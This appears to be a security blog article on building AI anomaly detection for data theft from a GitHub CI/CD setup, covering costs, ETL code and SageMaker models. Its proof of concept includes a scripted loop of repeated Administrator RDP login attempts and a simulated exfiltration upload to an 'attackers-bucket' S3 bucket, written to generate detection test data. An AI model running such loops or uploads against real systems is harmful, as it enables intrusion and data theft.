
Executive Summary
Imagine pouring years of hard work into your idea, only to have it stolen overnight. Every person and computer in your company is a target: finance with unreleased quarterly results, engineering with blueprints, development with new source code, or a journalist with the latest story.
That nightmare has been the reality for businesses, startups and everyday people alike. Just recently, OpenAI accused Chinese startup DeepSeek of stealing its proprietary tech. Data breaches are hitting harder than ever, with the average breach costing $4.88 million in 2024 and IP-specific losses reaching $173 per record.
This article covers something for everyone:
- Business Strategy
- Market Analysis
- Technical Implementation
The end result: capabilities that leverage the power of modern AI models to detect data leakage.
- Into Business? Jump to Business Case.
- Into the Techy Stuff? Jump to Proof of Concept.
Commercially available AI development tools make it possible to invest in lean AI engineering teams that complement cybersecurity blue-team capabilities at a fraction of the cost of third-party software.
In some cases, emerging AI detection companies (series A/B/C) may offer pricing and innovation that complement custom detections as well. However, current third-party software vendors appear bloated in valuation, and I expect those offering loss-leader prices to raise them to hedge losses. All this to say, the “build-it” strategy makes sense in some circumstances.
To understand if “the juice is worth the squeeze,” I demonstrate how your team can train and deploy AI models that monitor non-human identity (NHI) and network behavior across high-dimensional data sets and detect indicators of data loss.
PoC Example: AI Detecting Data Theft

Business Case
Is there a business case for building out your own AI Security team?
That depends.
Assuming you run lean and only build out core detective capabilities and automation, I estimate [2] FTEs and a cost of around $250k-$300k annually for R&D and cloud costs.
In this case, yes, you can make the business case: build-it provides $100k-$400k in cost avoidance annually.
To build a more fully featured Web UI and more advanced AI models, I’d estimate $650k-$800k in the first year and $400k thereafter.
In this case, the cost avoidance is maybe $250k-$500k over 3 years, and that is weighed against the vendor’s continuing innovation.
Comparatively, emerging companies carry a total cost of ownership of $400,000-$750,000 annually, including vendor costs and the FTEs needed to support integration and ongoing maintenance. That excludes the price increases expected as vendor lock-in sets in.
To calculate the ROI, estimate the total monetary impact to net income if the data is lost, or assume the total losses from a compliance or regulatory fine.
For example, if your company suffers a loss of proprietary software that results in a $1,000,000 loss, then ($1,000,000 - $300,000) / $300,000 ≈ 233% ROI and “build-it” may be worth it; whereas ($1,000,000 - $750,000) / $750,000 ≈ 33% ROI, so “buy-it” may not be worth the squeeze.
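The same back-of-the-envelope math as a quick Python sketch:

```python
def roi_pct(avoided_loss: float, annual_cost: float) -> float:
    """Simple ROI as a percentage: (benefit - cost) / cost * 100."""
    return (avoided_loss - annual_cost) / annual_cost * 100

print(f"build-it: {roi_pct(1_000_000, 300_000):.0f}% ROI")  # ~233%
print(f"buy-it: {roi_pct(1_000_000, 750_000):.0f}% ROI")    # ~33%
```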
Although these are possible tangible benefits, the case does not cover the intangibles of building a capability yourself, such as privacy, data security and core AI capabilities that become a strategic product advantage.

Buy (Emerging Third Party Companies)
Firstly, let’s evaluate the buy side of the build-vs-buy decision. From my research, we can assume an annual cost between $200,000 and $500,000 while a vendor is in series A/B funding. For technology and SaaS companies, modest annual price increases in the range of 5% to 15% have been reported in some cases (McKinsey/Bain). The total cost of ownership likely includes [1-2] engineering FTEs for integration and configuration. Let’s assume [1] engineer in the United States and [1] engineer in Asia to provide 24-hour coverage and offset U.S. labor costs. We can reasonably conclude that the total cost may be $400,000-$750,000 annually.
Side note: these figures are estimates from external sources and can change based on negotiation, contract length, and added services. Please use these numbers only as a rough guide, as NDAs prevent me from publishing exact price points.
Darktrace https://darktrace.com/
Solution: Darktrace Enterprise Immune System (Cyber AI Platform) uses unsupervised machine learning to detect anomalous behavior across networks, endpoints, and cloud environments. It’s widely cited for detecting sophisticated threats including data exfiltration and insider IP theft.
Estimated Annual Cost: For a medium‑sized enterprise, deployments are sometimes reported in the range of $150,000 to $300,000 per year, with larger or more complex environments potentially exceeding $500,000 annually.
Vectra AI https://www.vectra.ai/
Solution: Cognito Platform
Overview: Focuses on network threat detection and response by analyzing traffic patterns with AI, which can include early indicators of data breaches and IP exfiltration.
Estimated Annual Cost: Typical subscription costs for mid‑market to larger enterprises may fall between $100,000 and $400,000 per year.
Digital Guardian https://www.digitalguardian.com/
Solution: Digital Guardian Data Loss Prevention (DLP) with AI‑enhanced threat detection
Overview: Provides endpoint and network data protection with a focus on preventing data loss and intellectual property theft; AI components help identify anomalous user behavior and data movement.
Estimated Annual Cost: For enterprise-scale licensing, annual pricing is often in the range of $100,000 to $350,000, though deployments can vary widely.
Exabeam https://www.exabeam.com
Solution: Exabeam Advanced Analytics Platform (combining UEBA and SIEM capabilities)
Overview: Uses machine learning to model typical user and entity behavior, detecting anomalies that may indicate insider threats or data breaches.
Estimated Annual Cost: Smaller deployments might start around $100,000 per year, with larger or more comprehensive implementations scaling upward toward $300,000 or more.
Build-It

LOW-END
Let’s assume the most basic detection capabilities, which I will demonstrate later. By this, I mean no Web UI and no multi-tenancy: just simple ETL processes that transform audit log data from security data lakes, plus a low-code/no-code solution to build out detections without much need for custom Jupyter notebooks, Spark, or TensorFlow engineering work.
You will most likely want to build custom detections for Slack, GSUITE, Office 365, Entra and the network. You may leverage existing solutions such as EDR or CASB to feed into custom-made detections.
We can assume you would want at least [5] models for each solution, and then potentially another [5] models that combine network behavior with identity and app behavior.
I’d estimate [2] FTEs: possibly [1] FTE for ETL and model training, and [1] FTE for cloud provisioning, configuration and automation of the ETL and model APIs. The ongoing work includes continuous tuning of the models, analysis of the models and features, and improvements to data pre-processing. As time frees up, the effort can shift to building automated containment actions based on AI inferences.
Let’s assume you process [7] terabytes every three months. That data will need to be stored in cloud storage, transformed with an ETL service such as AWS Glue, written back to cloud storage as reduced training data, and then used to train the model and run inference 24/7 on batch or real-time reduced data.
Below is an example comparison table that shows approximate annual cloud resource costs for processing 7 TB of data per quarter (with data older than 30 days moved to cold storage) and two scenarios for staffing costs (one at $200,000 and one at $250,000 per year). These cloud costs are based on our earlier estimates:
| Cloud Provider | Annual Cloud Cost | Total Annual Cost (with $200K Staffing) | Total Annual Cost (with $250K Staffing) |
|---|---|---|---|
| AWS | $41,660 | $41,660 + $200,000 = $241,660 | $41,660 + $250,000 = $291,660 |
| Azure | $41,384 | $41,384 + $200,000 = $241,384 | $41,384 + $250,000 = $291,384 |
| GCP | $41,720 | $41,720 + $200,000 = $241,720 | $41,720 + $250,000 = $291,720 |
HIGH-END
On the high end, if we want a Web UI and more advanced AI algorithms that support temporal, time-series insights with higher feature dimensionality, then we’d invest in more labor to write custom Jupyter notebooks to train and deploy GNN and LSTM models.
I’d estimate [1] engineer for the Web UI, [2] engineers for AI development, training and tuning, [1] engineer for cloud automation and deployment, and likely [1] architect and strategist. We can assume [2] U.S.- or Europe-based resources and [3] Asia-based resources.
We can also assume that additional compute is needed to host the Web UI, CICD is needed to deploy the site and automate the training and model deployments, and there are compute requirements for Jupyter notebook training along with similar needs for cloud storage, processing and inference model hosting.
| Cloud Provider | Estimated Annual Cloud Cost | Total Annual Cost (with $600K Staffing) | Total Annual Cost (with $700K Staffing) |
|---|---|---|---|
| AWS | $50,000 | $650,000 | $750,000 |
| Azure | $48,000 | $648,000 | $748,000 |
| GCP | $52,000 | $652,000 | $752,000 |
Technical Proof of Concept
Let’s assume you want to build your own technical solution to detect data loss and avoid the financial risk of third-party software costs and vendor lock-in.
What would that look like from a technical perspective?
Security Data Lake
In my proof of concept, I build out two data feeds: network telemetry data and identity data from common developer systems (Github/CICD). We can use the identity logs and the network telemetry data to build our detective AI models.
Network Logs
For example, you may want to store network communication traffic in your security data lake in order to train your models on normal and abnormal communication patterns, such as data leakage.
This data can come from a variety of sources such as firewalls, proxies, flow logs, CASBs, etc.
| srcaddr | dstaddr | srcport | dstport | protocol | packets | bytes |
|---|---|---|---|---|---|---|
| 172.31.75.40 | 172.31.70.220 | 2049 | 58546 | 6 | 11 | 2399 |
| 172.31.70.220 | 172.31.75.40 | 58546 | 2049 | 6 | 15 | 3159 |
| 172.31.68.79 | 20.102.38.122 | 62462 | 443 | 6 | 12 | 4995 |
| 172.31.68.79 | 140.82.113.22 | 62437 | 443 | 6 | 56 | 48544 |
| 172.31.68.79 | 20.102.38.122 | 60952 | 443 | 6 | 15 | 13985 |
| 20.102.38.122 | 172.31.68.79 | 443 | 62426 | 6 | 8 | 5599 |
| 140.82.114.23 | 172.31.68.79 | 443 | 62441 | 6 | 11 | 6499 |
Github Logs (Non-Human Identity Logs)
In this proof of concept, I store some Github CICD audit logs to train the model on the identity behavior of the developer software running on the network device that generates the logs above. In your case, you might want to train a model on the behavior of an employee, a custom application, etc.
In more enterprise-scale solutions, we’d likely ingest identity logs from a number of tools such as AD, Entra, Slack, GSUITE, Outlook, etc. To demonstrate the idea, I’m using free features in Github to show how we might detect a compromised CICD system that could lead to stolen source code.
| username | timestamp | date | branch | git_action | src_ip |
|---|---|---|---|---|---|
| secSandman | 14:12:31 PST | Feb 9 2025 | main | commit | 24.x.x.x |
| secSandman | 14:12:18 PST | Feb 9 2025 | main | commit | 24.x.x.x |
| secSandman | 14:12:07 PST | Feb 9 2025 | main | commit | 24.x.x.x |
| secSandman | 14:11:54 PST | Feb 9 2025 | main | commit | 24.x.x.x |
| secSandman | 14:11:42 PST | Feb 9 2025 | main | commit | 24.x.x.x |
| secSandman | 14:11:30 PST | Feb 9 2025 | main | commit | 24.x.x.x |
| secSandman | 14:11:18 PST | Feb 9 2025 | main | commit | 24.x.x.x |
Transformation
The data will need to be transformed into both a file format and a structure that our models will accept. For example, CSV and Protobuf are acceptable file formats, while some models require only numeric vectors and a fixed set of features to train.
Other AI models can scale to many high-dimensional features, so we can be creative about which features, time sequences and data-cleansing pre-processing steps are used to reduce noise and false-positive rates.
For a simple demonstration, two ETL pipelines were built to create data sets for 1) the identity behavior and 2) the network behavior of the computers where non-human identities run.
Keeping the secret sauce to myself, I’ll point out that the ETL reads all objects (logs/telemetry) from the data lake, hashes any identifiable information to improve privacy, and then uses PySpark to create numeric vector counts of features that might be useful in identifying unusual behavior.
Notably, I’m creating two data sets to train two models, with the intention that the unique combination of the two models improves detection accuracy across the attack chain.
Pre-Processing Github Audit Logs
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, sha2

spark = SparkSession.builder.appName("github-audit-etl").getOrCreate()

# Define the source S3 path for the fixed-date Git logs (e.g., Feb 9, 2025)
source_s3_path = "s3://secsandman-datalake/etl/input/02-09-2025/"

# Read the Git logs as a comma-delimited CSV file with header.
# (Comma is the default delimiter, so the option can be omitted or explicitly set.)
git_logs_df = (
    spark.read.option("delimiter", ",")
    .option("header", "true")
    .csv(source_s3_path)
)

# Optional: trim whitespace from all column names
for col_name in git_logs_df.columns:
    git_logs_df = git_logs_df.withColumnRenamed(col_name, col_name.strip())

# Drop rows that have null values in either 'username' or 'src_ip'
git_logs_df = git_logs_df.na.drop(subset=["username", "src_ip"])

# Hash the username column using sha2 (256-bit) to create an opaque unique identifier.
# This produces a hexadecimal string.
transformed_df = git_logs_df.withColumn("hashed_username", sha2(col("username"), 256))
Pre-Processing Network Telemetry
from pyspark.sql import SparkSession

spark = SparkSession.builder.appName("netflow-etl").getOrCreate()

# Define the source S3 path (raw netflow logs)
source_s3_path = "s3://secsandman-datalake/etl/input/02-08-2025/"

# Read the files as text (Spark auto-decompresses .gz files)
lines_df = spark.read.text(source_s3_path)

# Convert the DataFrame to an RDD of strings
lines_rdd = lines_df.rdd.map(lambda row: row.value)

# Remove any header lines (assuming they start with "version")
data_rdd = lines_rdd.filter(lambda line: not line.startswith("version"))

# Define the column names (hard-coded based on known header)
columns = ["version", "account-id", "interface-id", "srcaddr", "dstaddr", "srcport",
           "dstport", "protocol", "packets", "bytes", "start", "end", "action", "log-status"]

# Split each line on whitespace into a list of values
parsed_rdd = data_rdd.map(lambda line: line.split())

# Assemble the parsed rows into a DataFrame with named columns
netflow_df = parsed_rdd.toDF(columns)
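As a generic illustration of the vectorization step (deliberately not the PoC’s actual feature set), one might aggregate per-source-address flow statistics into numeric features like this:

```python
from pyspark.sql import functions as F

# Generic per-source-address aggregates as numeric features
features_df = (
    netflow_df
    .groupBy("srcaddr")
    .agg(
        F.count("*").alias("flow_count"),
        F.sum(F.col("bytes").cast("long")).alias("total_bytes"),
        F.countDistinct("dstaddr").alias("unique_destinations"),
        F.countDistinct("dstport").alias("unique_dest_ports"),
    )
)
```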
Training the Models
Here are a few models I explored for this proof of concept. I’m intentionally omitting which models I use, their results, the combination of these models, and the specific features that improve prediction. (A generic training sketch follows this list.)
RCF (Random Cut Forest)
- Best for quick, unsupervised anomaly detection on static, aggregated numeric data.
- Pros: Ease of use, scalability, minimal pre-processing beyond aggregation.
- Cons: Doesn’t model time, may require tuning, and can be less interpretable.
LSTM (Long Short-Term Memory)
- Best for scenarios where temporal dynamics and sequences are essential to capture anomaly behavior.
- Pros: Excellent for sequential data, flexible modeling capabilities.
- Cons: Requires more data and careful sequence preparation, is computationally intensive, and can be complex to train and tune—especially if your data is not naturally sequential.
IP Insights
- Best for environments specifically focused on Identity + IP anomaly detection with strictly defined 2-dimensional input.
- Pros: Domain-specific optimizations, easy integration with managed SageMaker services, minimal configuration beyond ensuring the right input shape.
- Cons: Rigid input requirements and less flexibility if your data or anomaly definitions change.
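Since the specific models, features and results are intentionally omitted, here is a generic sketch of training and deploying a managed SageMaker Random Cut Forest model. The IAM role, file name, instance types and hyperparameters below are placeholders, not the PoC configuration:

```python
import numpy as np
from sagemaker import RandomCutForest

# Placeholder execution role; substitute your own
role = "arn:aws:iam::123456789012:role/SageMakerExecutionRole"

# Toy training matrix: one row per aggregated event, numeric features only
train_data = np.loadtxt("network_features.csv", delimiter=",").astype("float32")

rcf = RandomCutForest(
    role=role,
    instance_count=1,
    instance_type="ml.m5.xlarge",
    num_samples_per_tree=512,
    num_trees=100,
)

# Train on the record set, then host a real-time inference endpoint
rcf.fit(rcf.record_set(train_data))
predictor = rcf.deploy(initial_instance_count=1, instance_type="ml.m5.large")
```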
Detecting Account Compromise and Data Leakage
Signaling “Unusual” GitHub Identity Behavior
To test the models, I used a VPN to log in from various regions across the United States that I would not normally use to access Github or to RDP into the target CICD machine.

As you may know, the source IP of the communication will appear to be the IP of the VPN network.

I run a custom script which automatically interacts with the GitHub API every 5 minutes, performing various actions. This behavior forces various characteristics that the AI model may evaluate:
- The unusual source IP
- The unusual time of day the action is taken
- The Git actions (push, pull, commit, clone)
- The account being used
- The frequency of the actions
- Errors / Response Codes
These identity actions are merely examples and could be anything based on the behavior of the identity and the available data sets. A real-world use case would likely be more complex, with many attributes and a need to control for the dynamic nature of new identities and computer hosts, spurious correlation, seasonality and heterogeneity.
Example: Script Forcing Unusual GitHub Behavior
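For illustration, a minimal version of such a script might look like the sketch below; the repository name, token variable and exact API actions are assumptions, not the PoC script itself:

```python
import os
import time
import requests

# Hypothetical repository and token; adjust for your environment
GITHUB_TOKEN = os.environ["GITHUB_TOKEN"]
REPO = "secSandman/imaginary-source-code"
HEADERS = {
    "Authorization": f"Bearer {GITHUB_TOKEN}",
    "Accept": "application/vnd.github+json",
}

def touch_repo() -> None:
    """Perform a few API actions that leave audit-log entries."""
    base = f"https://api.github.com/repos/{REPO}"
    requests.get(f"{base}/branches", headers=HEADERS, timeout=10)      # list branches
    requests.get(f"{base}/commits", headers=HEADERS, timeout=10)       # recent commits
    requests.get(f"{base}/tarball/main", headers=HEADERS, timeout=30)  # clone-like read

if __name__ == "__main__":
    while True:
        touch_repo()
        time.sleep(300)  # repeat every 5 minutes
```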

Signaling “Unusual” Server Admin RDP Behavior
From the same unusual VPN locations, I attempt to RDP into the target Github runner machine that accesses the “imaginary source code,” i.e., the intellectual property.
I run a script which automates repeated login attempts from the VPN IP address as the Windows system administrator (a rough sketch follows the list below).
This behavior forces some important characteristics that the AI model may evaluate:
- The unusual source IP
- The unusual time of day the action is taken
- The network Accept/Reject (toggle network ACLs on and off)
- Network telemetry data
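Here is a rough sketch of that login-attempt loop, assuming a Linux host with the xfreerdp client installed; the target address, username and timing are placeholders:

```python
import subprocess
import time

TARGET = "203.0.113.10"  # hypothetical CICD host address
USER = "Administrator"

# Repeated RDP authentication attempts; most will be rejected, generating
# the Accept/Reject network telemetry the models can score
for attempt in range(50):
    subprocess.run(
        ["xfreerdp", f"/v:{TARGET}", f"/u:{USER}", "/p:wrong-password",
         "/cert:ignore", "+auth-only"],
        capture_output=True,
    )
    time.sleep(30)
```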

Signaling Data Exfiltration
Finally, from the CICD machine in question, I attempt to upload various-sized files from the local machine to both AWS S3 and GDRIVE: actions that are atypical compared to the day-to-day CICD automation in GitHub Actions (clone, execute PowerShell, update the local branch, push code back). This simulated “data theft” forces network communication from the CICD host to new destinations such as an “attacker’s bucket.”
This behavior may signal either data exfiltration or command and control behavior.
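The S3 half of that simulation can be as simple as the sketch below; the bucket name and file sizes are placeholders:

```python
import boto3

s3 = boto3.client("s3")

# Simulated exfiltration: push increasingly large files to a destination
# the CICD host never normally talks to
for size_mb in (1, 10, 100):
    path = f"/tmp/fake_source_{size_mb}mb.bin"
    with open(path, "wb") as f:
        f.write(b"\0" * size_mb * 1024 * 1024)
    s3.upload_file(path, "attackers-bucket", f"exfil/{size_mb}mb.bin")
```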


AI Threat Detection
The “fake attacker logs” generated in the previous section mimic possible data leakage and possible attacks on our GitHub CICD system. We can then feed these events to our AI models’ inference endpoints (APIs) and receive anomaly scores which should, in turn, indicate whether these events are worth investigating further.
To leverage our AI APIs, I build two “live event” pre-processing pipelines which handle the incoming log events and transform them into a format compatible with the AI inference API.
In other words, the AI API needs to receive the data in the same format in which it was trained (see the sketch after the list below).
- GitHub Identity Events –> Transformation –> AI Inference
- Host Network Events –> Transformation –> AI Inference
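For a SageMaker-hosted model, that inference call might look like the sketch below; the endpoint name is hypothetical, and the CSV payload mirrors the transformed feed shown next:

```python
import boto3

runtime = boto3.client("sagemaker-runtime")

# One transformed network event as a CSV row, matching the training format
csv_event = "920548008,325259033,-1929623325,8,208,125758,31.0,8"

response = runtime.invoke_endpoint(
    EndpointName="network-anomaly-detector",  # hypothetical endpoint name
    ContentType="text/csv",
    Body=csv_event,
)
print(response["Body"].read().decode())  # JSON containing the anomaly score
```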
Example: Transformed Network Events Data Feed
| 920548008 | 325259033 | -1929623325 | 8 | 208 | 125758 | 31.0 | 8 |
| 920548008 | -834910768 | -1929623325 | 13 | 311 | 233528 | 31.0 | 13 |
| 1464271538 | 920548008 | -1929623325 | 1 | 9 | 6704 | 31.0 | 1 |
| 920548008 | 379774092 | -1929623325 | 5 | 661769 | 2604323 | 31.0 | 1 |
| 920548008 | 1075262734 | -1929623325 | 1 | 8 | 1124 | 31.0 | 1 |
| 920548008 | -453642178 | -1929623325 | 3 | 29 | 6980 | 31.0 | 3 |
| 920548008 | 902914720 | -1929623325 | 1 | 944 | 309639 | 31.0 | 1 |
| -1285531185 | 920548008 | -1929623325 | 5 | 1135 | 1629802 | 31.0 | 1 |
| 920548008 | -1285531185 | -1929623325 | 5 | 140 | 10327 | 31.0 | 5 |
| 325259033 | 920548008 | -1929623325 | 8 | 177 | 70545 | 31.0 | 1 |
| 902914720 | 920548008 | -1929623325 | 4 | 3248 | 331556 | 31.0 | 1 |
Github Identity Scores


Network Telemetry Scores


Analyzing AI Anomaly Scores

When we analyze the proof of concept data sets, the application identity behavior anomaly scores exhibit a bimodal distribution.
One cluster shows very low (more negative) scores, around –13 to –14, while another cluster centers near 0.16 to 0.20, with occasional outliers around –2.77 and 0.11.
This spread suggests that under normal conditions, most application identity events fall into these two distinct groups, but events with scores exceeding two standard deviations above the mean in either cluster may indicate anomalous account behavior—potentially a sign of compromise.
In this case, when an account performs unusual actions on the Github CICD systems, the anomaly score increases.
In parallel, the network anomaly scores, which capture unusual network communications that could signal data leakage or theft, also display their own distribution pattern, with many scores clustering in the 1–2 range.
In this case, when the host computer performs unusual network activity to and from the Github CICD systems, the anomaly score increases.
When we combine the identity and network feeds, and the same hashed identifier appears in both data sets with anomaly scores significantly above the respective distribution’s mean (i.e., more than two standard deviations), there is a strong correlation suggesting that the account in question might not only be compromised at the application identity level but is also exhibiting network behavior consistent with data exfiltration.
To sum things up, this dual anomaly across identity and network telemetry serves as an indicator for further investigation into potential account compromise and data leakage. The goal is to evaluate the entire attack chain, since attacks typically occur as a chain of events across various technologies and systems over time (high dimensionality and temporal events).
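As a closing sketch, that dual-anomaly correlation can be implemented with a simple join on the hashed identifier; the column names and the two-standard-deviation threshold are assumptions drawn from this section:

```python
import pandas as pd

def zscore(s: pd.Series) -> pd.Series:
    """Standardize a score column against its own distribution."""
    return (s - s.mean()) / s.std(ddof=0)

def flag_dual_anomalies(identity_df: pd.DataFrame,
                        network_df: pd.DataFrame,
                        threshold: float = 2.0) -> pd.DataFrame:
    """Join identity and network anomaly scores on the hashed identifier and
    keep entities scoring more than `threshold` std devs above the mean in both."""
    ident = identity_df.assign(identity_z=zscore(identity_df["anomaly_score"]))
    net = network_df.assign(network_z=zscore(network_df["anomaly_score"]))
    merged = ident.merge(net, on="hashed_id", suffixes=("_id", "_net"))
    return merged[(merged["identity_z"] > threshold) &
                  (merged["network_z"] > threshold)]
```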
If you’re crazy enough to have made it this far, I hope you enjoyed the content as much as I enjoyed making it.
— Happy Hunting


